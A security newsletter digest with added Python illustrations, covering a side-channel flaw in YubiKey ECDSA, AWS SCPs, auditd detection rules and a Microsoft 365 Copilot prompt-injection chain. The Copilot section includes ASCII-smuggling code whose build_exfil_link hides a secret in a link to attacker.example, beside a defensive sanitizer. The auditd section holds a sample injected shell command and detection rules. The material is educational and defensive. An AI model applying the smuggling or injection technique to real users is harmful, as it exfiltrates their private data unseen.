🔓
Attacks & Vulnerabilities
Thousands Exposed in Fota Wildlife Park Breach (4 minute read)
Fota Wildlife Park is notifying customers who bought tickets on the park's website since May 12 that their data was exposed in a breach. Affected users are advised to change any password associated with the site, to watch for phishing emails, and, notably, to cancel any debit or credit card used on the site. The park has not disclosed exactly what data was stolen, how it was taken, or how many customers are affected.
YubiKeys are vulnerable to cloning attacks thanks to newly discovered side channel (3 minute read)
The YubiKey 5 series hardware token for two-factor authentication has a side-channel flaw in its ECDSA implementation that allows an attacker with physical access to the device (and specialized lab equipment) to clone it. Yubico has confirmed that YubiKey 5 series devices running firmware prior to 5.7 are affected; the flaw lies in the cryptographic library of the Infineon security microcontroller, which is also used in other vendors' authentication devices. YubiKey firmware cannot be updated in the field, so affected keys remain vulnerable for their lifetime and can only be replaced; the attack does still require the attacker to obtain the physical key.
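The side channel the researchers reported sits in a modular inversion: in ECDSA the per-signature nonce k has to be inverted modulo the curve order, and the library's inversion took a number of steps that depends on k. Leaking even a few bits of k across many signatures is enough for well-known lattice attacks to recover the private key. The block below is an added illustration in Python, not the researchers' code or Yubico's, of why that matters: a textbook extended-Euclid inverse whose iteration count varies with the secret, beside a square-and-multiply inverse whose operation sequence depends only on the public modulus. Python's big integers are not constant-time; the point is the data-dependent control flow. The modulus is the secp256k1 group order, used only as a realistic-size prime, and the nonces are constructed.

```python
# Order of the secp256k1 group, used here only as a realistic-size prime modulus.
N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141


def egcd_inverse_leaky(k, n):
    """Textbook extended Euclid: returns (k^-1 mod n, number of loop iterations).
    The iteration count and every quotient depend on k, so a measurement that
    resolves individual steps (timing, power or EM) reveals information about k."""
    r0, r1 = n, k % n
    s0, s1 = 0, 1          # invariant: s_i * k == r_i (mod n)
    steps = 0
    while r1 != 0:
        q = r0 // r1
        r0, r1 = r1, r0 - q * r1
        s0, s1 = s1, s0 - q * s1
        steps += 1
    if r0 != 1:
        raise ValueError("k is not invertible modulo n")
    return s0 % n, steps


def fermat_inverse_fixed(k, n):
    """k^-1 = k^(n-2) mod n for prime n, by left-to-right square-and-multiply.
    The sequence of squarings and multiplications follows the bits of the public
    exponent n-2, so the step count is identical for every k. (Illustrative only:
    this fixes the control flow, it does not make Python arithmetic constant-time.)"""
    acc, steps = 1, 0
    for bit in bin(n - 2)[2:]:
        acc = acc * acc % n
        steps += 1
        if bit == "1":
            acc = acc * k % n
            steps += 1
    return acc, steps


def compare(ks, n=N):
    """Check both inverses agree and are correct for each nonce, and return the two
    lists of step counts so the data dependence is visible side by side."""
    leaky, fixed = [], []
    for k in ks:
        inv_a, st_a = egcd_inverse_leaky(k, n)
        inv_b, st_b = fermat_inverse_fixed(k, n)
        if inv_a != inv_b or inv_a * k % n != 1:
            raise AssertionError(f"inverse mismatch for k={k:#x}")
        leaky.append(st_a)
        fixed.append(st_b)
    return leaky, fixed


# Constructed nonces: a few edge cases plus two arbitrary values, all below N.
SAMPLE_NONCES = [1, 2, 3, 0x12345678, N - 1,
                 0x3ED2A4F7B9C1E3D5F7A9B1C3D5E7F9A1B3C5D7E9F1A3B5C7D9E1F3A5B7C9D1E3]

if __name__ == "__main__":
    leaky, fixed = compare(SAMPLE_NONCES)
    for k, a, b in zip(SAMPLE_NONCES, leaky, fixed):
        print(f"k={hex(k)[:14]:<16} euclid steps={a:<4} fixed steps={b}")
```

Run it and the Euclid column swings from 1 step (k = 1) and 2 steps (k = 2, k = N-1) up to well over a hundred for a full-size nonce, while the fixed column never changes. That variation, observed from outside the chip, is the whole attack surface.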
AWS IAM: A Comprehensive Guide Towards Least Privilege (11 minute read)
This article provides a comprehensive overview of the tools available to fine-tune AWS IAM access. It recommends several important SCPs, such as limiting access to specific regions and blocking root user access, along with establishing zones of trust, using permissions boundaries, running IAM Access Analyzer, and separating human from non-human identities. It suggests starting with a more permissive set of permissions to learn how the team actually uses AWS, then tightening from there.
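Two of the SCPs the article recommends, the region restriction and the root-user block, are worth seeing as policy documents together with how they evaluate. What follows is an added example, not code from the article: the two policies in the form AWS documents for SCPs, plus a deliberately simplified evaluator that models only Deny statements, the Action/NotAction distinction and the StringEquals/StringNotEquals/StringLike operators, applied to a few constructed request contexts. The approved regions, the global-service exemption list, the account id and the role name are assumptions.

```python
import fnmatch

# Constructed SCP 1: deny any action outside the approved regions, except for
# global services whose API endpoints live in us-east-1. The region list and the
# exemption list are assumptions for this demo, not the article's values.
REGION_DENY_SCP = {
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "DenyOutsideApprovedRegions",
        "Effect": "Deny",
        "NotAction": ["iam:*", "sts:*", "organizations:*", "support:*"],
        "Resource": "*",
        "Condition": {
            "StringNotEquals": {"aws:RequestedRegion": ["eu-west-1", "eu-central-1"]}
        },
    }],
}

# Constructed SCP 2: block every action taken as the root user of a member account.
ROOT_DENY_SCP = {
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "DenyRootUser",
        "Effect": "Deny",
        "Action": "*",
        "Resource": "*",
        "Condition": {"StringLike": {"aws:PrincipalArn": "arn:aws:iam::*:root"}},
    }],
}

SCPS = [REGION_DENY_SCP, ROOT_DENY_SCP]


def _matches(patterns, value):
    """IAM-style wildcard match ('*' and '?') of a value against one or more patterns."""
    if isinstance(patterns, str):
        patterns = [patterns]
    return any(fnmatch.fnmatchcase(value, p) for p in patterns)


def _condition_holds(condition, ctx):
    """Evaluate the three condition operators used above against a request context.
    Simplified IAM semantics: the negated operator (StringNotEquals) matches when
    the key is absent from the request, the others do not."""
    for operator, pairs in condition.items():
        for key, expected in pairs.items():
            expected = [expected] if isinstance(expected, str) else expected
            actual = ctx.get(key)
            if operator == "StringEquals":
                ok = actual is not None and actual in expected
            elif operator == "StringNotEquals":
                ok = actual is None or actual not in expected
            elif operator == "StringLike":
                ok = actual is not None and _matches(expected, actual)
            else:
                raise ValueError(f"unsupported condition operator: {operator}")
            if not ok:
                return False
    return True


def scp_denies(scps, ctx):
    """Return the Sid of the first Deny statement matching the request, else None.
    Only Deny statements are modelled: an SCP never grants access by itself, it caps
    what IAM policies in the account can grant. This assumes the default
    FullAWSAccess SCP is still attached, so no action is missing an Allow."""
    action = ctx["action"]
    for scp in scps:
        for stmt in scp["Statement"]:
            if stmt["Effect"] != "Deny":
                continue
            if "Action" in stmt:
                applies = _matches(stmt["Action"], action)
            else:  # NotAction: the statement applies to every action NOT listed
                applies = not _matches(stmt["NotAction"], action)
            if applies and _condition_holds(stmt.get("Condition", {}), ctx):
                return stmt["Sid"]
    return None


# Constructed request contexts (account id and role name are made up).
SAMPLE_REQUESTS = [
    {"action": "ec2:RunInstances", "aws:RequestedRegion": "eu-west-1",
     "aws:PrincipalArn": "arn:aws:iam::111122223333:role/Deployer"},
    {"action": "ec2:RunInstances", "aws:RequestedRegion": "us-west-2",
     "aws:PrincipalArn": "arn:aws:iam::111122223333:role/Deployer"},
    {"action": "iam:CreateUser", "aws:RequestedRegion": "us-east-1",
     "aws:PrincipalArn": "arn:aws:iam::111122223333:role/Deployer"},
    {"action": "s3:ListAllMyBuckets", "aws:RequestedRegion": "eu-west-1",
     "aws:PrincipalArn": "arn:aws:iam::111122223333:root"},
]


def evaluate_all(requests=SAMPLE_REQUESTS, scps=SCPS):
    """Verdict per request: the denying Sid, or None when no SCP blocks it."""
    return [scp_denies(scps, r) for r in requests]


if __name__ == "__main__":
    for req, verdict in zip(SAMPLE_REQUESTS, evaluate_all()):
        who = req["aws:PrincipalArn"].rsplit(":", 1)[1]
        print(f"{req['action']:<22} {req['aws:RequestedRegion']:<13} {who:<14} "
              f"-> {verdict or 'not denied by SCPs'}")
```

The NotAction exemption is the part teams most often get wrong: IAM, STS and Organizations calls are made against us-east-1, so a region deny without it locks everyone out of identity operations. The third request shows that exemption working, and the fourth shows the root block firing even in an approved region.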
Linux Detection Engineering with Auditd (28 minute read)
The first part of a series on Linux detection engineering from Elastic Labs, focused on installing and configuring auditd. It lists installation methods for auditd and explains the three rule types auditd supports: control rules configure the auditd process itself, file system rules watch files for read, write, execute, and attribute-change access, and system call rules, the workhorse of auditd, specify which syscalls to monitor and log. The second part covers using the Auditd Manager Elastic integration to install and configure auditd at scale and presents Elastic detection rules for various scenarios.
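To make the three rule types concrete, here is an added example (not code from the Elastic Labs series) in Python: a rules file with one control rule, one file system rule and one syscall rule, followed by a parser that groups the multi-record events auditd emits for those rules and runs two constructed detections over a constructed audit.log excerpt. The uid 33 for the web server user, the rule keys, the sample records and the detection logic are assumptions for the demo.

```python
import re
from collections import defaultdict

# Rules in audit.rules / auditctl syntax that would generate events like the
# constructed sample below; one example of each rule type the series describes.
AUDIT_RULES = """\
# control rules: flush existing rules, then size the kernel backlog
-D
-b 8192
# file system rule: watch /etc/passwd for writes and attribute changes
-w /etc/passwd -p wa -k identity
# syscall rule: record every execve by a 64-bit process, tagged "exec"
-a always,exit -F arch=b64 -S execve -k exec
"""

# Constructed /var/log/audit/audit.log excerpt (not real host data). Records that
# belong to one event share the serial inside msg=audit(timestamp:serial).
SAMPLE_LOG = """\
type=SYSCALL msg=audit(1725350400.101:5001): arch=c000003e syscall=59 success=yes exit=0 ppid=1200 pid=1201 auid=4294967295 uid=33 gid=33 euid=33 comm="sh" exe="/usr/bin/dash" key="exec"
type=EXECVE msg=audit(1725350400.101:5001): argc=3 a0="sh" a1="-c" a2=6964203B2077686F616D69
type=SYSCALL msg=audit(1725350400.205:5002): arch=c000003e syscall=59 success=yes exit=0 ppid=900 pid=901 auid=1000 uid=1000 gid=1000 euid=1000 comm="ls" exe="/usr/bin/ls" key="exec"
type=EXECVE msg=audit(1725350400.205:5002): argc=2 a0="ls" a1="-la"
type=SYSCALL msg=audit(1725350401.010:5003): arch=c000003e syscall=257 success=yes exit=3 ppid=1 pid=2222 auid=1000 uid=0 gid=0 euid=0 comm="vi" exe="/usr/bin/vi" key="identity"
type=PATH msg=audit(1725350401.010:5003): item=0 name="/etc/passwd" inode=1234 dev=fd:01 mode=0100644 ouid=0 ogid=0
"""

FIELD_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')
MSG_RE = re.compile(r"msg=audit\((\d+\.\d+):(\d+)\)")


def decode_value(raw, hex_ok=False):
    """Strip quotes. auditd hex-encodes a string value (unquoted run of hex digits)
    when it contains spaces or non-printables; decode only where the caller knows
    the field is a string, since SYSCALL a0..a3 are legitimately hex registers."""
    if len(raw) >= 2 and raw[0] == '"' and raw[-1] == '"':
        return raw[1:-1]
    if hex_ok and len(raw) % 2 == 0 and re.fullmatch(r"[0-9A-Fa-f]+", raw):
        return bytes.fromhex(raw).decode("utf-8", "replace")
    return raw


def parse_record(line):
    """One audit.log line -> dict of fields plus _ts and _serial (None if not audit)."""
    m = MSG_RE.search(line)
    if not m:
        return None
    rec = {"_ts": float(m.group(1)), "_serial": int(m.group(2))}
    rec.update(FIELD_RE.findall(line))
    rtype = rec.get("type")
    for key, raw in list(rec.items()):
        if key.startswith("_"):
            continue
        is_argv = rtype == "EXECVE" and re.fullmatch(r"a\d+", key) is not None
        rec[key] = decode_value(raw, hex_ok=is_argv)
    return rec


def parse_events(log_text):
    """Group records by serial so a SYSCALL record can be read with its EXECVE/PATH."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_record(line)
        if rec:
            events[rec["_serial"]].append(rec)
    return dict(events)


WEB_UIDS = {"33"}                     # www-data on Debian-family systems (assumption)
SHELLS = {"sh", "bash", "dash", "zsh"}
EXECVE_X86_64 = "59"                  # execve syscall number on x86_64


def detect(events):
    """Two constructed detections over grouped events -> [(serial, rule, detail)]."""
    hits = []
    for serial, recs in sorted(events.items()):
        by_type = {r["type"]: r for r in recs}   # last record of each type wins
        sc = by_type.get("SYSCALL")
        if not sc:
            continue
        # Rule 1: the web server uid launching a shell (a classic web shell / RCE tell)
        if (sc.get("syscall") == EXECVE_X86_64 and sc.get("uid") in WEB_UIDS
                and sc.get("comm") in SHELLS):
            ex = by_type.get("EXECVE", {})
            argv = [ex.get(f"a{i}", "") for i in range(int(ex.get("argc", "0")))]
            hits.append((serial, "web_server_shell_exec", " ".join(argv)))
        # Rule 2: a successful write or attribute change on a watched identity file
        if sc.get("key") == "identity" and sc.get("success") == "yes":
            path = by_type.get("PATH", {}).get("name", "?")
            hits.append((serial, "identity_file_modified",
                         f"{sc.get('exe')} auid={sc.get('auid')} -> {path}"))
    return hits


def run(log_text=SAMPLE_LOG):
    return detect(parse_events(log_text))


if __name__ == "__main__":
    for serial, rule, detail in run():
        print(f"{serial} {rule}: {detail}")
```

Two details carry over to real deployments: the hex-encoded EXECVE argument (a2 above is "id ; whoami") is how auditd ships any argument containing a space, so a detection that greps the raw line for a command string will miss it; and auid survives sudo/su where uid does not, which is why the second rule reports auid rather than uid.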
Changes to the OSCP (5 minute read)
Offsec has announced changes to the OSCP exam format, including the elimination of bonus points and an assumed-breach model for the Active Directory portion. It has also introduced the OSCP+ designation, which holders must renew every three years via CPEs, by retaking the exam, or by earning a higher-level certification in order to keep the + distinction. The community is split: some see OSCP+ as a cash grab and the AD changes as too easy, while others welcome that the certification will now fulfill DoD requirements.
Microsoft Copilot: From Prompt Injection to Exfiltration of Personal Information (6 minute read)
This blog post describes a vulnerability chain in Microsoft 365 Copilot that allowed theft of personal information via prompt injection. The chain combines prompt injection, automatic tool invocation (Copilot retrieving further data on the attacker's behalf without being asked by the user), and ASCII smuggling, which hides the stolen data inside a rendered hyperlink using invisible Unicode tag characters, so that the data leaves the tenant without the user's knowledge or consent. The author responsibly disclosed the chain to Microsoft, which has since shipped fixes.
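ASCII smuggling, the last link in the chain, relies on the Unicode tag characters U+E0020..U+E007E, which map one-to-one onto printable ASCII but render as nothing in most user interfaces. The following is an added example in Python, not the author's proof of concept or Microsoft's code: it shows the attacker's encoding, what the user sees in the chat, what the attacker's server receives once the link is clicked, and the output filter a chat UI should apply before rendering model output. The secret string, the link text and the attacker.example domain are constructed.

```python
from urllib.parse import quote, unquote

# Unicode "tag" characters U+E0020..U+E007E mirror printable ASCII 0x20..0x7E and
# have no glyph in most renderers, which is what makes ASCII smuggling work.
TAG_BASE = 0xE0000
TAG_LOW, TAG_HIGH = 0xE0020, 0xE007E
TAG_BLOCK_END = 0xE007F               # U+E007F is CANCEL TAG; strip it as well


def smuggle(text):
    """Encode printable ASCII as invisible tag characters."""
    out = []
    for ch in text:
        if not 0x20 <= ord(ch) <= 0x7E:
            raise ValueError(f"only printable ASCII can be tag-encoded: {ch!r}")
        out.append(chr(TAG_BASE + ord(ch)))
    return "".join(out)


def unsmuggle(text):
    """Recover hidden ASCII; every code point outside the tag range is ignored."""
    return "".join(chr(ord(ch) - TAG_BASE) for ch in text if TAG_LOW <= ord(ch) <= TAG_HIGH)


def strip_tags(text):
    """Remove every code point in the tag block (U+E0000..U+E007F)."""
    return "".join(ch for ch in text if not TAG_BASE <= ord(ch) <= TAG_BLOCK_END)


def build_exfil_link(visible_text, secret, base_url):
    """Attacker side: the markdown a prompt injection asks the assistant to emit.
    The secret rides in the URL as tag characters; the visible text looks harmless."""
    return f"[{visible_text}]({base_url}?d={smuggle(secret)})"


def url_of(markdown_link):
    """Pull the target URL out of a markdown link of the form [text](url)."""
    return markdown_link[markdown_link.rindex("](") + 2:-1]


def render_for_user(markdown):
    """Approximates a chat UI: tag characters have no glyph, so this is all the
    user perceives. The secret is simply not there to be noticed."""
    return strip_tags(markdown)


def browser_follows(url):
    """When the link is clicked the browser percent-encodes the non-ASCII code
    points (four UTF-8 bytes each) before sending the request to the attacker."""
    return quote(url, safe=":/?=&")


def attacker_recovers(request_url):
    """Attacker's server: percent-decode, then collapse the tags back to ASCII."""
    return unsmuggle(unquote(request_url))


def sanitize_model_output(markdown):
    """Defense: drop tag characters from model output before rendering, and report
    whether any were present so the event can be logged and alerted on."""
    cleaned = strip_tags(markdown)
    return cleaned, cleaned != markdown


# Constructed demo values: the secret is invented and the domain is a placeholder.
SECRET = "MFA code 482913"
LINK = build_exfil_link("Open the Q3 sales summary", SECRET, "https://attacker.example/c")

if __name__ == "__main__":
    wire = browser_follows(url_of(LINK))
    print("user sees:    ", render_for_user(LINK))
    print("wire request: ", wire[:72], "...")
    print("attacker got: ", attacker_recovers(wire))
    print("sanitized:    ", sanitize_model_output(LINK))
```

Stripping the tag block is the cheap fix and is what the sanitizer does here; a more complete filter would also reject links to domains outside an allow list, since a hidden payload can be carried in any unrendered code point, not only in this block. Treating the presence of tag characters in model output as a detection signal, as the second return value allows, is worth more than the stripping itself.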